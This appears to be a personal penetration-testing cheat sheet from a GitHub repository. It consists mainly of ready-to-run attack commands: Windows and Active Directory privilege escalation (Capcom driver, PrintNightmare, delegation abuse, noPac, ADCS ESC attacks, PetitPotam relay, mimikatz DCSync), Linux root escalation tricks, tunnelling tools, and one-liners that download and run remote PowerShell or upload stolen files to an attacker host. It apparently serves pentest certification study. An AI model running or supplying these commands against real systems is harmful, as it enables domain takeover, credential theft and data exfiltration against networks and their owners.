https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys https://github.com/TarlogicSecurity/EoPLoadDriver/ https://github.com/musheebat/Compiled-capcom-exploit

.\EoPLoadDriver.exe System\CurrentControlSet\Capcom .\Capcom.sys
.\ExploitCapcom.exe

SeManageVolume

https://github.com/CsEnox/SeManageVolumeExploit

# Default
C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll

$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)

#DLL Hijacking
systeminfo
c:\windows\system32\wbem\tzres.dll

PrintNightmare

https://github.com/calebstewart/CVE-2021-1675

HiveNightmare

https://github.com/GossiTheDog/HiveNightmare/releases/tag/0.6

S4U

SpoolSample (Unrusted)

https://github.com/jtmpu/PrecompiledBinaries/blob/master/SpoolSample.exe
https://github.com/BC-SECURITY/Empire/blob/main/empire/server/data/module_source/exploitation/Invoke-SpoolSample.ps1

.\Rubeus.exe monitor /interval:5 /nowrap

.\SpoolSample.exe targetDC.inlanefreight.local OWN.inlanefreight.local

.\Rubeus.exe renew /ticket:BASE64 /ptt /nowrap

.\mimikatz.exe "privilege::debug" "lsadump::dcsync /user:administrator /domain:htb.local" "exit"

.\Rubeus.exe asktgt /rc4:NTLM /user:administrator /ptt /nowrap

dir \\dc01.inlanefreight.local\c$

# linux
echo "base64" | base64 -d > ticket.kirbi
impacket-ticketConverter ticket.kirbi tgt.ccache

krbrelayx (Unrusted) - User

https://github.com/dirkjanm/krbrelayx

# Computer
## Get Computer NTLM
impacket-secretsdump admin:adminpass@192.168.130.104
## DNS
python dnstool.py -u INLANEFREIGHT.LOCAL\\genWuser -p passwd -r my.INLANEFREIGHT.LOCAL -d <OwnIP> --action add <DNS_IP>
python dnstool.py -u CORP.com\\'FILES01$' -p 'aad3b435b51404eeaad3b435b51404ee:048056e9616cfcd8226ed8eb6cc43daf' -r my.corp.com -d <OwnIP>  --action add dc01.corp.com
## SPN registered
python addspn.py -u CORP.com\\'FILES01$' -p aad3b435b51404eeaad3b435b51404ee:048056e9616cfcd8226ed8eb6cc43daf -s HOST/my.corp.com --additional dc01.corp.com
# recov tgt in tgs
sudo python krbrelayx.py -aesKey aes256-cts-hmac-sha1-96-VALUE -dc-ip <DC_IP>

## printerBUG
python printerbug.py corp.com/'FILES01$'@dc01.corp.com my.corp.com -hashes :048056e9616cfcd8226ed8eb6cc43daf


# User
# 制約なし委任されてるUserへのGenericWriteがあればいける
## DNS
python dnstool.py -u INLANEFREIGHT.LOCAL\\genWuser -p passwd -r my.INLANEFREIGHT.LOCAL -d <OwnIP> --action add <DNS_IP>
# SPN registered
## vim /etc/hosts to connect to the dc01
python addspn.py -u inlanefreight.local\\genWuser -p passwd --target-type samname -t <target_user_with_Unrusted> -s CIFS/my.inlanefreight.local dc01.inlanefreight.local

# recov tgt in tgs
sudo python krbrelayx.py -s <target_user_with_Unrusted> -p 
sudo python krbrelayx.py -s <target_user_with_Unrusted> -hashes :NTLM 

#printerBUG 
python printerbug.py inlanefreight.local/genWuer:passwd@10.129.205.35 my.inlanefreight.local

# DCsync
unset KRB5CCNAME
export KRB5CCNAME=./Administrator.ccache
impacket-secretsdump dc01.INLANEFREIGHT.LOCAL -k -no-pass -just-dc-user Administrator -just-dc-ntlm

DC-Constrained Delegation

unset KRB5CCNAME
impacket-getST -spn SRV/DC01 'INLANEFREIGHT.LOCAL/delegrate-User:pass' -impersonate Administrator -dc-ip 10.129.193.100 
export KRB5CCNAME=./Administrator.ccache

# vim /etc/hosts DC01 (SPN)
impacket-psexec -k -no-pass INLANEFREIGHT.LOCAL/administrator@DC01

RBCD

GenericWrite to PC, etc
https://github.com/Kevin-Robertson/Powermad
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation

PowerShell

IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.37/PowerView.ps1')
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.37/Powermad.ps1')

New-MachineAccount -MachineAccount TEST -Password $(ConvertTo-SecureString 'Pass12345!' -AsPlainText -Force) -Verbose 
Get-DomainComputer TEST

$ComputerSid = Get-DomainComputer TEST -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$ComputerSid)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

# RBCD User etc GenericWrite
$credentials2 = New-Object System.Management.Automation.PSCredential "resourced\rbcd_user", (ConvertTo-SecureString 'rbcd_pass' -AsPlainText -Force)
Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose -Credential $credentials2

.\Rubeus.exe hash /user:TEST$ /password:'Pass12345!' /domain:resourced.local
.\Rubeus.exe s4u /user:TEST$ /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:administrator /msdsspn:cifs/dc01.resourced.local /ptt /nowrap /altservice:host,ldap,http,winrm,cifs

klist
ls \\msdsspn_fqdn\c$

Bash

impacket-addcomputer -computer-name 'TEST$' -computer-pass 'Pass12345!' -dc-ip 10.129.205.35 resourced.local/Writepriv_user:Writepriv_pass

impacket-rbcd -dc-ip 172.19.99.10 -delegate-from 'TEST$' -delegate-to 'TARGET$' -action 'write' -hashes :bb73d5056f1f2084e5b5bbe18261f6b6 'INLANEFREIGHT.local/Writepriv_user'
impacket-getST -spn cifs/TARGET.resourced.local resourced.local/'TEST$':'Pass12345!' -impersonate administrator -dc-ip 192.168.171.175

# vim /etc/hosts DC01 (SPN)
KRB5CCNAME=./Administrator.ccache impacket-psexec -k -no-pass resourced.local/administrator@TARGET.resourced.local

nopac

cd /opt/noPac
source ./venv/bin/activate

# scan
python3 scanner.py htb.local/svc_test:testpass -dc-ip 172.16.5.5 -use-ldap

#psexec
python3 noPac.py htb.local/svc_test:testpass -dc-ip 172.16.5.5  -dc-host DC01 -shell --impersonate administrator -use-ldap

# DCSync
python3 noPac.py htb.local/svc_test:testpass -dc-ip 172.16.5.5  -dc-host DC01 --impersonate administrator -use-ldap -dump -just-dc-user htb.local/administrator

ADCS

# find service
nxc ldap 172.16.117.0/24 -u  -p '' -M adcs

https://github.com/secure-77/Certipy-Docker

# Cert request
## Certify.exe
.\Certify.exe find /vulnerable
.\Certify.exe request /ca:<CA Name> /template:<Template Name> /altname:Administrator

openssl pkcs12 -in cert.pem -inkey priv.key -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out admin.pfx

##certipy
### docker build -t certipy:latest .
### docker run -it -v $(pwd):/tmp certipy:latest certipy find -dc-ip 192.168.210.30 -u 'jodie.summers@nara-security.com' -p hHO_S9gff7ehXw -vulnerable -debug -stdout
certipy find -dc-ip 10.10.11.69 -u 'ca_svc@fluffy.htb' -hashes aaaaaaaaa -vulnerable -stdout
# ntpdate dc-ip
certipy req -u 'user' -p Password -ca CA_Name -dc-ip DCIP -template TempName -upn
'Administrator@example.com' -debug

## ESC 3
certipy req -u 'own_user' -p 'Password' -ca CA_Name -template User -on-behalf-of 'lab\administrator' -pfx own_user.pfx -dc-ip 10.129.228.236

# TGT request
## Rubeus
.\Rubeus.exe asktgt /user:Administrator /certificate:admin.pfx /getcredentials /password:
## certipy
certipy auth -pfx administrator.pfx -dc-ip <dc-ip> -debug


# ESC 10
## Check
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc
## Attack
certipy account read -u 'user' -p 'Password' -user own_user -dc-ip 10.129.228.236
certipy account update -u 'user' -p 'Password' -user own_user -upn 'lab-dc$@lab.local' -dc-ip 10.129.228.236
certipy req -u 'own_user' -hashes :ee22ddf0f8a66db4217050e6a948f9d6 -ca CA_Name -template User -dc-ip 10.129.228.236
certipy account update -u 'user' -p 'Password' -user own_user -upn 'user2@lab.local' -dc-ip 10.129.228.236
## ldap_shell for RBCD
certipy auth -pfx lab-dc.pfx -dc-ip 10.129.228.236 -ldap-shell
add_computer plaintext plaintext123
set_rbcd lab-dc$ plaintext$
## RBCD
impacket-getST -spn cifs/LAB-DC.LAB.LOCAL -impersonate 'dc01$' -dc-ip 10.129.228.236 lab.local/'plaintext$':plaintext123

# ESC 4
certipy template -u 'user' -p 'Password' -ca CA_Name -template ESC4 -save-old -dc-ip 10.129.228.236
## recover
certipy template -u 'user' -p 'Password' -ca CA_Name -template ESC4 -configuration ESC4.json

# ESC 7
certipy ca -u 'user@lab.local' -p 'Password' -ca CA_Name -enable-template 'SubCA'
certipy ca -u 'user@lab.local' -p 'Password' -ca CA_Name -add-officer ManageCertificates_User
certipy req -u 'user@lab.local' -p 'Password' -ca CA_Name -template SubCA -upn Administrator
certipy ca -u 'user@lab.local' -p 'Password' -ca CA_Name -issue-request 31
certipy req -u 'user@lab.local' -p 'Password' -ca CA_Name -retrieve 31

PassTheCert

IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.37/PowerView.ps1')

wget https://github.com/Flangvik/SharpCollection/raw/refs/heads/master/NetFramework_4.7_x64/PassTheCert.exe

# RBCD
.\PassTheCert.exe --server <server-ip or fqdn> --cert-path <pfx-path> --add-computer --computer-name <Computer Name>
Get-DomainComputer authority -Properties distinguishedname
Get-DomainComputer <Computer Name> -Properties objectsid
.\PassTheCert.exe --server <server-ip or fqdn> --cert-path <pfx-path> --rbcd --target <CN=DC,OU=Domain Controllers,DC=example,DC=com> --sid <Resource-SID>

impacket-getST -spn 'cifs/authority.authority.htb' -impersonate Administrator 'authority.htb/DESKTOP-1337$:99U1VOMhRX6LEvISJJQ9PMo07osUJLcp'
impacket-wmiexec -k -no-pass authority.htb/Administrator@authority.authority.htb

# DCSync
Get-DomainComputer authority -Properties distinguishedname
Get-DomainUser own_uer -Properties objectsid
.\PassTheCert.exe --server authority --cert-path .\administrator.pfx --elevate --target DC=AUTHORITY,DC=HTB --sid Own_User_SID

PetitPotam

https://github.com/topotam/PetitPotam
https://github.com/ly4k/PetitPotam

https://github.com/dirkjanm/PKINITtools

# listener
sudo ntlmrelayx.py -debug -smb2support --target http://target.htb.local/certsrv/certfnsh.asp --adcs --template DomainController
# 強制認証
python3 PetitPotam.py kaliIP targetIP -u user -p password -d domain

# TGT request
.\Rubeus.exe asktgt /user:Administrator /certificate:[Base64_Cert] /getcredentials /password:

UAC bypass

https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC

Group

https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges

Other Tools

https://github.com/expl0itabl3/Toolies
https://github.com/dxnboy/redteam
https://github.com/Flangvik/SharpCollection
https://github.com/Sentinal920/Pentest-Tools

Linux

SUGGEST

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh

/etc/passwd

joe@debian-privesc:~$ openssl passwd w00t
joe@debian-privesc:~$ openssl passwd -1 w00t
Fdzt.eqJQ4s0g
joe@debian-privesc:~$ echo 'root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash' >> /etc/passwd

shadow

unshadow ./etc/passwd ./etc/shadow > unshadow.txt
# $y$
john --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt --rules /usr/share/john/rules/best64.rule unshadow

sudoer

LFILE='/etc/sudoers'
echo username ALL=(ALL) NOPASSWD: ALL >> c:$LFILE

Kernel Ecpliot

# Environment
wget https://github.com/schecthellraiser606/oscp_cheet/raw/main/Dockerfile
docker build -t vuln .
docker run -v /root/work/:/work -it vuln /bin/bash

Cron File backup

echo 'chmod +s /bin/bash' >root.sh
chmod +x root.sh
touch '/var/www/html/--checkpoint=1'
touch '/var/www/html/--checkpoint-action=exec=bash root.sh'

Transfer

Port Forwading

SSH

# localport
ssh -L 4455:172.16.50.217:445 database_admin@10.4.50.215
# l Dynamic
## proxychains smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234
ssh -D 0.0.0.0:1080 database_admin@10.4.50.215
tail /etc/proxychains4.conf

# remote
sudo systemctl start ssh
ssh -R 127.0.0.1:2345:10.4.50.215:5432 kali@192.168.118.4
# よくあるやつ
ssh -D 0.0.0.0:1080 -R 80:127.0.0.1:80 -R 1336:192.168.45.205:1336 support@192.168.228.153

# r Dynamic
ssh -R 1080 kali@192.168.118.4
tail /etc/proxychains4.conf

sshuttle

sshuttle -r database_admin@192.168.50.63:22 10.4.50.0/24 172.16.50.0/24

plink

C:\Windows\Temp\plink.exe -ssh -l kali -pw <YOUR PASSWORD HERE> -R 127.0.0.1:9833:127.0.0.1:3389 192.168.118.4

Chisel

https://github.com/jpillora/chisel/releases

./chisel_1.9.0_linux_amd64 server -p 2345 --reverse
.\chisel.exe client --max-retry-count 2 192.168.45.157:2345 R:80:172.16.118.241:80 R:445:172.16.118.241:445

# Dynamic
./chisel_1.9.0_linux_amd64 server -p 2345 --socks5 --reverse
./chisel_1.9.0_linux_amd64 client --max-retry-count 2 192.168.49.100:2345 R:socks

#Listening fowarding
./chisel_1.9.0_linux_amd64 server -p 2345 
.\chisel.exe client --max-retry-count 2 192.168.45.184:2345 1337:127.0.0.1:80

# tail /etc/proxychains4.conf
[ProxyList]
socks5 127.0.0.1 1080

# stop chisel
Stop-Process -Name chisel -Force

Ligolo-ng

https://github.com/nicocha30/ligolo-ng/releases

# file
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_proxy_0.8.2_linux_amd64.tar.gz
tar -zxvf ligolo-ng_proxy_0.8.2_linux_amd64.tar.gz

wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_agent_0.8.2_linux_amd64.tar.gz
tar -zxvf ligolo-ng_agent_0.8.2_linux_amd64.tar.gz
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.8.2/ligolo-ng_agent_0.8.2_windows_amd64.zip
unzip ligolo-ng_agent_0.8.2_windows_amd64.zip

sudo ./proxy -selfcert -laddr 0.0.0.0:2345

./agent -connect 192.168.45.10:2345 -ignore-cert
.\agent.exe -connect 192.168.45.10:2345 -ignore-cert

session 
session : 1

interface_create --name ligolo
tunnel_start --tun ligolo
ifconfig 

sudo ip route add 172.16.0.0/16 dev ligolo
sudo ip route delete 172.16.0.0/16 dev ligolo
ip route

# Transport Kali Web
listener_add --addr 0.0.0.0:8888 --to 127.0.0.1:80 --tcp
listener_add --addr 0.0.0.0:2345 --to 127.0.0.1:80 --tcp
listener_list

# agent local port
sudo ip route add 240.0.0.1/32 dev ligolo

# delete int
sudo ip link set dev ligolo down
sudo ip link delete ligolo

SMB

impacket-smbserver work ./work -smb2support

copy  \\192.168.\test.zip
xcopy Win32\* \\FILE04\c$\Windows\Temp\ /s /e

FTP

# get
prompt
mget *

wget -m ftp://ftp:ftp@192.168.166.114/*

# passive mode
passive

# binary mode
bin
# text
ascii

# upload folder
/var/ftp/pub/

HTTP

https://github.com/juliourena/plaintext/blob/master/Powershell/PSUpload.ps1

#powershell
wget https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.37/PSUpload.ps1');Invoke-FileUpload -Uri http://10.10.14.37/upload -File 

# linux
python3 -c "import requests;requests.post(\"http://10.10.14.68:8000/upload\",files={\"files\":open(\"/home/lnorgaard/RT30000.zip\",\"rb\")})"
curl -X POST http://10.10.14.68:8000/upload -F 'files=@/home/lnorgaard/RT30000.zip'

Tips

list

for ip in $(seq 1 254); do echo 192.168.50.$ip; done > ips

RDP admin

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

xfreerdp3 /v: /u:administrator /pth: /dynamic-resolution /drive:.,linux /bpp:8 /compression /audio-mode:0 -themes -wallpaper

User-Name-List

https://github.com/urbanadventurer/username-anarchy

git clone https://github.com/urbanadventurer/username-anarchy

./username-anarchy Bill Gates > bill.txt
./username-anarchy --input-file ../full-name.txt > unames.txt

sheet

https://github.com/0xsyr0/OSCP

Name		Name	Last commit message	Last commit date
Latest commit History 90 Commits
C2_cheat		C2_cheat
azure_cheet		azure_cheet
oscp_cheet		oscp_cheet
osed_cheet		osed_cheet
osep_cheet		osep_cheet
oswe_cheat		oswe_cheat
README.md		README.md

Folders and files

Latest commit

History

Repository files navigation

My Cheet Sheet

SWEEP

Port Scan

rustscan

nmap

Powershell

Recon

Autorecon

SNMP

SMB

DNS

RPC

LDAP

Web

App

subdomain

dir

WordPress

endpoint

POST Fuzz

enum4linux

Initial Access

Path Traversal

id_sa

LFI

Webshell

File Upload

XXE

DTD

SVG Image

Reverse Shell

Bypass

Linux

Windows

SQLi

MSSQL

Inject

impacket-mssqlclient

PowerUpSQL

ExploitDB

shellcode

Webdav

ldap_shell

hash_catch

Other Bypass

Phishing

Foothold

Linux

Background

Interactiveshell

Windows

SHELL

Client Soft

Credential Access

Brute Force

hashcrack

Windows

netexec

PsMapexec

kerbrute

mimikatz

SharpKatz

DomainPasswordSpray

AD

impacket

DCsync - secretsdump

Rubeus

Lateral Movement

NTLM Relay

ESC 8

ESC11

Inveigh

PsExec

winRM

DCOM

RunasCs